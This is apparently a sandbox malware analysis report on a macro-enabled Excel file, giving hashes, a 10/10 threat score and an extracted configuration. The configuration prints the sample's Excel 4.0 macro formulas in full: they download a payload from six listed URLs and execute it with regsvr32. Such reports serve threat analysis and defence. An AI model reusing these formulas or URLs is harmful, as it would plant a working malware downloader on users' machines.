General
-
Target
d2c05d3ecc78976f4cbde830b995e9763f9e64c13dbd79db7546ccb72b8db78b
-
Size
49KB
-
Sample
241120-z7enpsthrm
-
MD5
2416fe2df23daf5475973631c5d75b9a
-
SHA1
e54f4fe4de5e14d1d962d8a17da4f031205d2e4e
-
SHA256
d2c05d3ecc78976f4cbde830b995e9763f9e64c13dbd79db7546ccb72b8db78b
-
SHA512
60c0a884554ea79728e03af544ada215daa63bd8da3228751ab9c6622e32b72626aeb2b82e3275f5df95ec283cd5649a158432176c01177ef6e613933323b054
-
SSDEEP
768:SYCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:SYu2xXncDSmSIBlGeuSEcm2h0B5lqB
Behavioral task
behavioral1
Sample
d2c05d3ecc78976f4cbde830b995e9763f9e64c13dbd79db7546ccb72b8db78b.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d2c05d3ecc78976f4cbde830b995e9763f9e64c13dbd79db7546ccb72b8db78b.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://retailhpsinterview.com/search/yNbsL/
http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/
http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/
http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/
https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/
https://gsmjordan.com/SupplierPanel/XII/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://retailhpsinterview.com/search/yNbsL/","..\ax.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/","..\ax.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/","..\ax.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/","..\ax.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/","..\ax.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gsmjordan.com/SupplierPanel/XII/","..\ax.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx") =RETURN()
Extracted
http://retailhpsinterview.com/search/yNbsL/
http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/
http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/
http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/
https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/
https://gsmjordan.com/SupplierPanel/XII/
Targets
-
-
Target
d2c05d3ecc78976f4cbde830b995e9763f9e64c13dbd79db7546ccb72b8db78b
-
Size
49KB
-
MD5
2416fe2df23daf5475973631c5d75b9a
-
SHA1
e54f4fe4de5e14d1d962d8a17da4f031205d2e4e
-
SHA256
d2c05d3ecc78976f4cbde830b995e9763f9e64c13dbd79db7546ccb72b8db78b
-
SHA512
60c0a884554ea79728e03af544ada215daa63bd8da3228751ab9c6622e32b72626aeb2b82e3275f5df95ec283cd5649a158432176c01177ef6e613933323b054
-
SSDEEP
768:SYCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:SYu2xXncDSmSIBlGeuSEcm2h0B5lqB
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-